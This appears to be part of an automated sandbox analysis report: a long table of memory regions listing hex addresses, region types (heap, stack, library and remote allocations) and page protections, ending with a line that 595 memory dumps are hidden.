page read and write
|
||
|
3C0000
|
trusted library allocation
|
page read and write
|
||
|
5C5000
|
heap
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
2C9000
|
trusted library allocation
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
3B90000
|
heap
|
page read and write
|
||
|
29A000
|
trusted library allocation
|
page execute and read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
46EA000
|
stack
|
page read and write
|
||
|
372000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page execute and read and write
|
||
|
527000
|
heap
|
page read and write
|
||
|
256F000
|
stack
|
page read and write
|
||
|
79B000
|
heap
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
3B0C000
|
heap
|
page read and write
|
||
|
35B9000
|
trusted library allocation
|
page read and write
|
||
|
592000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
180000
|
trusted library allocation
|
page read and write
|
||
|
599000
|
heap
|
page read and write
|
||
|
9984000
|
heap
|
page read and write
|
||
|
292000
|
trusted library allocation
|
page read and write
|
||
|
1E10000
|
trusted library allocation
|
page read and write
|
||
|
2785000
|
trusted library allocation
|
page read and write
|
||
|
137000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3B0C000
|
heap
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
59C000
|
heap
|
page read and write
|
||
|
241C000
|
trusted library allocation
|
page read and write
|
||
|
1C4000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
453E000
|
stack
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
C561000
|
trusted library allocation
|
page read and write
|
||
|
3333000
|
trusted library allocation
|
page read and write
|
||
|
A370000
|
trusted library allocation
|
page read and write
|
||
|
3529000
|
trusted library allocation
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
4EF7000
|
heap
|
page read and write
|
||
|
A370000
|
trusted library allocation
|
page read and write
|
||
|
4CE0000
|
heap
|
page read and write
|
||
|
1FF0000
|
trusted library allocation
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
2358000
|
heap
|
page read and write
|
||
|
470000
|
trusted library allocation
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
239C000
|
heap
|
page read and write
|
||
|
506000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
9900000
|
heap
|
page read and write
|
||
|
9EAF000
|
stack
|
page read and write
|
||
|
97BE000
|
stack
|
page read and write
|
||
|
6DD000
|
stack
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
A29C000
|
stack
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
52B000
|
heap
|
page read and write
|
||
|
236C000
|
heap
|
page read and write
|
||
|
551E000
|
stack
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
35A0000
|
trusted library allocation
|
page read and write
|
||
|
7F61000
|
trusted library allocation
|
page read and write
|
||
|
5B80000
|
heap
|
page read and write
|
||
|
239D000
|
heap
|
page read and write
|
||
|
236F000
|
heap
|
page read and write
|
||
|
515000
|
heap
|
page read and write
|
||
|
59DE000
|
stack
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
3A90000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2540000
|
trusted library allocation
|
page read and write
|
||
|
2568000
|
trusted library allocation
|
page read and write
|
||
|
2495000
|
trusted library allocation
|
page read and write
|
||
|
235F000
|
heap
|
page read and write
|
||
|
1DA000
|
trusted library allocation
|
page read and write
|
||
|
272000
|
trusted library allocation
|
page read and write
|
||
|
1D70000
|
heap
|
page read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
170000
|
trusted library allocation
|
page read and write
|
||
|
5750000
|
heap
|
page read and write
|
||
|
4B5E000
|
stack
|
page read and write
|
||
|
3FB9000
|
trusted library allocation
|
page read and write
|
||
|
1F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
243000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D0000
|
remote allocation
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
494F000
|
stack
|
page read and write
|
||
|
4EFB000
|
heap
|
page read and write
|
||
|
2383000
|
heap
|
page read and write
|
||
|
2DE000
|
stack
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
2389000
|
heap
|
page read and write
|
||
|
30F6000
|
trusted library allocation
|
page read and write
|
||
|
2456000
|
trusted library allocation
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
3E0C000
|
stack
|
page read and write
|
||
|
587000
|
heap
|
page read and write
|
||
|
20F000
|
stack
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
6AE000
|
stack
|
page read and write
|
||
|
2451000
|
trusted library allocation
|
page read and write
|
||
|
5E5000
|
heap
|
page read and write
|
||
|
4BFE000
|
stack
|
page read and write
|
||
|
4F47000
|
heap
|
page read and write
|
||
|
232F000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
6302000
|
trusted library allocation
|
page read and write
|
||
|
790000
|
trusted library allocation
|
page read and write
|
||
|
2438000
|
trusted library allocation
|
page read and write
|
||
|
28B8000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
9BB0000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
23A2000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
469C000
|
stack
|
page read and write
|
||
|
35B2000
|
trusted library allocation
|
page read and write
|
||
|
2B9B000
|
heap
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
trusted library allocation
|
page read and write
|
||
|
54F000
|
heap
|
page read and write
|
||
|
2364000
|
heap
|
page read and write
|
||
|
997F000
|
heap
|
page read and write
|
||
|
3A91000
|
heap
|
page read and write
|
||
|
4F53000
|
heap
|
page read and write
|
||
|
232D000
|
heap
|
page read and write
|
||
|
2C3000
|
trusted library allocation
|
page read and write
|
||
|
289000
|
stack
|
page read and write
|
||
|
4BBD000
|
stack
|
page read and write
|
||
|
1C6000
|
stack
|
page read and write
|
||
|
557E000
|
stack
|
page read and write
|
||
|
2CF000
|
trusted library allocation
|
page read and write
|
||
|
538E000
|
stack
|
page read and write
|
||
|
2AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
4DC0000
|
heap
|
page read and write
|
||
|
2040000
|
heap
|
page execute and read and write
|
||
|
3A5000
|
heap
|
page read and write
|
||
|
4B7000
|
heap
|
page read and write
|
||
|
2010000
|
heap
|
page execute and read and write
|
||
|
3A8F000
|
stack
|
page read and write
|
||
|
541E000
|
stack
|
page read and write
|
||
|
203D000
|
stack
|
page read and write
|
||
|
490000
|
trusted library allocation
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
5D52000
|
heap
|
page read and write
|
||
|
8F61000
|
trusted library allocation
|
page read and write
|
||
|
376000
|
heap
|
page read and write
|
||
|
596000
|
heap
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
98BD000
|
stack
|
page read and write
|
||
|
3C56000
|
heap
|
page read and write
|
||
|
51BD000
|
stack
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
250000
|
trusted library allocation
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
A6E000
|
stack
|
page read and write
|
||
|
237E000
|
stack
|
page read and write | page guard
|
||
|
2C7000
|
trusted library allocation
|
page read and write
|
||
|
2501000
|
trusted library allocation
|
page read and write
|
||
|
3B0C000
|
heap
|
page read and write
|
||
|
770000
|
trusted library allocation
|
page read and write
|
||
|
36E000
|
stack
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
234F000
|
heap
|
page read and write
|
||
|
4C5E000
|
stack
|
page read and write
|
||
|
2D4F000
|
stack
|
page read and write
|
||
|
2272000
|
heap
|
page read and write
|
||
|
27FC000
|
trusted library allocation
|
page read and write
|
||
|
BF61000
|
trusted library allocation
|
page read and write
|
||
|
519F000
|
stack
|
page read and write
|
||
|
547E000
|
stack
|
page read and write
|
||
|
4F82000
|
heap
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
5410000
|
heap
|
page read and write
|
||
|
7561000
|
trusted library allocation
|
page read and write
|
||
|
234C000
|
heap
|
page read and write
|
||
|
203F000
|
stack
|
page read and write
|
||
|
480000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E10000
|
heap
|
page read and write
|
||
|
617000
|
heap
|
page read and write
|
||
|
996F000
|
heap
|
page read and write
|
||
|
173000
|
trusted library allocation
|
page execute and read and write
|
||
|
52E000
|
heap
|
page read and write
|
||
|
2394000
|
heap
|
page read and write
|
||
|
527000
|
heap
|
page read and write
|
||
|
3E9000
|
trusted library allocation
|
page read and write
|
||
|
3451000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
54E000
|
stack
|
page read and write
|
||
|
7BB000
|
heap
|
page read and write
|
||
|
9F61000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
210C000
|
stack
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
3C38000
|
heap
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
5B91000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
3B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C0000
|
trusted library allocation
|
page read and write
|
||
|
4CFD000
|
heap
|
page read and write
|
||
|
3FE1000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
2070000
|
trusted library allocation
|
page read and write
|
||
|
62C5000
|
trusted library allocation
|
page read and write
|
||
|
4E7F000
|
heap
|
page read and write
|
||
|
6C7000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
62DD000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
1D60000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
trusted library allocation
|
page read and write
|
||
|
9FEF000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
27A2000
|
trusted library allocation
|
page read and write
|
||
|
574F000
|
stack
|
page read and write
|
||
|
22D0000
|
trusted library allocation
|
page read and write
|
||
|
AAE000
|
stack
|
page read and write
|
||
|
5390000
|
heap
|
page read and write
|
||
|
42B0000
|
trusted library allocation
|
page read and write
|
||
|
515000
|
heap
|
page read and write
|
||
|
519E000
|
stack
|
page read and write | page guard
|
||
|
780000
|
trusted library allocation
|
page read and write
|
||
|
2792000
|
trusted library allocation
|
page read and write
|
||
|
30F3000
|
heap
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
461B000
|
stack
|
page read and write
|
||
|
5CEE000
|
stack
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
226000
|
heap
|
page read and write
|
||
|
5B1E000
|
stack
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
3B0C000
|
heap
|
page read and write
|
||
|
26C2000
|
trusted library allocation
|
page read and write
|
||
|
5D30000
|
heap
|
page read and write
|
||
|
98FE000
|
stack
|
page read and write
|
||
|
2773000
|
trusted library allocation
|
page read and write
|
||
|
A370000
|
trusted library allocation
|
page read and write
|
||
|
516000
|
heap
|
page read and write
|
||
|
396F000
|
stack
|
page read and write
|
||
|
271F000
|
stack
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
3331000
|
trusted library allocation
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
3AFA000
|
heap
|
page read and write
|
||
|
258A000
|
trusted library allocation
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
4DE000
|
stack
|
page read and write
|
||
|
A561000
|
trusted library allocation
|
page read and write
|
||
|
1F50000
|
trusted library allocation
|
page read and write
|
||
|
9B60000
|
heap
|
page read and write
|
||
|
536E000
|
stack
|
page read and write
|
||
|
5E4F000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
3AFB000
|
heap
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
24D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3AF9000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
7A0000
|
trusted library allocation
|
page read and write
|
||
|
5D34000
|
heap
|
page read and write
|
||
|
2592000
|
trusted library allocation
|
page read and write
|
||
|
264000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page execute and read and write
|
||
|
59E000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2D0000
|
remote allocation
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
2381000
|
trusted library allocation
|
page read and write
|
||
|
9C2E000
|
stack
|
page read and write
|
||
|
277000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B5000
|
trusted library allocation
|
page read and write
|
||
|
3AD000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
592000
|
heap
|
page read and write
|
||
|
510E000
|
stack
|
page read and write
|
||
|
327000
|
stack
|
page read and write
|
||
|
211E000
|
stack
|
page read and write
|
||
|
3AA6000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
62B1000
|
trusted library allocation
|
page read and write
|
||
|
25A000
|
trusted library allocation
|
page read and write
|
||
|
3479000
|
trusted library allocation
|
page read and write
|
||
|
8561000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
312F000
|
heap
|
page read and write
|
||
|
2B7F000
|
stack
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
22AE000
|
stack
|
page read and write
|
||
|
4ED000
|
heap
|
page read and write
|
||
|
5A2000
|
heap
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
239C000
|
heap
|
page read and write
|
||
|
4F05000
|
heap
|
page read and write
|
||
|
2460000
|
heap
|
page execute and read and write
|
||
|
261E000
|
stack
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
25D000
|
heap
|
page read and write
|
||
|
592000
|
heap
|
page read and write
|
||
|
490000
|
trusted library allocation
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
280000
|
trusted library allocation
|
page execute and read and write
|
||
|
244000
|
trusted library allocation
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
26C7000
|
trusted library allocation
|
page read and write
|
||
|
1EE0000
|
trusted library allocation
|
page read and write
|
||
|
4E49000
|
heap
|
page read and write
|
||
|
4F39000
|
heap
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
3AD000
|
stack
|
page read and write
|
||
|
9561000
|
trusted library allocation
|
page read and write
|
||
|
60E0000
|
heap
|
page read and write
|
||
|
233E000
|
heap
|
page read and write
|
||
|
59E000
|
heap
|
page read and write
|
||
|
A330000
|
heap
|
page read and write
|
||
|
2466000
|
heap
|
page execute and read and write
|
||
|
48E000
|
stack
|
page read and write
|
||
|
20C0000
|
trusted library allocation
|
page read and write
|
||
|
4B0F000
|
stack
|
page read and write
|
||
|
518000
|
heap
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
527000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
5F5E000
|
stack
|
page read and write
|
||
|
1F40000
|
heap
|
page read and write
|
||
|
2A7E000
|
stack
|
page read and write
|
||
|
235F000
|
heap
|
page read and write
|
||
|
4982000
|
heap
|
page read and write
|
||
|
4B0000
|
trusted library allocation
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2254000
|
heap
|
page read and write
|
||
|
246F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
24B000
|
stack
|
page read and write
|
||
|
559000
|
heap
|
page read and write
|
||
|
255C000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1FAE000
|
stack
|
page read and write
|
||
|
49C000
|
stack
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
4C3F000
|
stack
|
page read and write
|
||
|
542000
|
heap
|
page read and write
|
||
|
51EE000
|
stack
|
page read and write
|
||
|
3332000
|
trusted library allocation
|
page read and write
|
||
|
20BE000
|
stack
|
page read and write
|
||
|
2454000
|
trusted library allocation
|
page read and write
|
||
|
32F000
|
heap
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
4F60000
|
heap
|
page read and write
|
||
|
30C000
|
stack
|
page read and write
|
||
|
5AA000
|
heap
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
2849000
|
trusted library allocation
|
page read and write
|
There are 595 hidden memdumps, click here to show them.